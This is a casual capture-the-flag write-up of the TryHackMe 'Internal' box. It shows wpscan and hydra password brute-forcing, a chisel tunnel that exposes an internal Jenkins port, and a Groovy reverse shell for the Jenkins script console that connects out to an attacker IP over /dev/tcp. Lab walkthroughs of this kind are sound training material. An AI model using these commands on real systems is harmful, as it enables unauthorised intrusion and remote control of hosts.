THM Internal
This was an amazing challenge! I learned a few new tricks to thought about documenting it here real quick
It all started with a WordPress site....
Easy bruteforce with wpscan
wpscan --url http://10.10.40.183/wordpress/ -U wp_users.txt -P /usr/share/wordlists/rockyou.txt
Lucky weeee. We got the admin password. First thing to do is insert a reverse shell into the wp-theme. Sounds like shell is on the menu boooys.
Next enumerate a little and we see that Jenkins is running in a docker container that has been spawned by the user aubreanna. Sounds like root with extra steps. I thought I need to escape the docker somehow and get root. But wait, theres less.
www-data@internal:/$ ps auxf | grep jenkins
ps auxf | grep jenkins
aubrean+ 1491 0.0 0.0 1148 4 ? Ss 17:22 0:00 \_ /sbin/tini -- /usr/local/bin/jenkins.sh
aubrean+ 1525 2.5 16.1 2596000 329676 ? Sl 17:22 0:50 \_ java -Duser.home=/var/jenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -jar /usr/share/jenkins/jenkins.war
aubrean+ 1564 0.0 0.0 0 0 ? Z 17:22 0:00 \_ [jenkins.sh] <defunct>
www-data 2306 0.0 0.0 11464 1008 ? S 17:55 0:00 | \_ grep jenkins
www-data@internal:/$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:37707 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::4444 :::* LISTEN 1907/./chisel_1.7.7
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 10.10.173.250:68 0.0.0.0:* -
Here comes the new trick I've learned. VERRY NOICE:
How do I expose this service so I can exploit it?
chisel to the rescue
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
First run this on the server
./chisel_1.7.7_linux_amd64 client internal.thm:4444 2222:127.0.0.1:8080
And then this on your machine
./chisel_1.7.7_linux_amd64 server -p 4444
Quicky bruteforce the Jenkins login
hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 2222 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Now you are able to access the Jenkins script console on http://localhost:2222/script and add your reverse shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.8.49.147/1339;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Now chilling on the docker container and enumerate more until we find a note.txt which contains the root password for the box. What?
Yes thats it....
Comments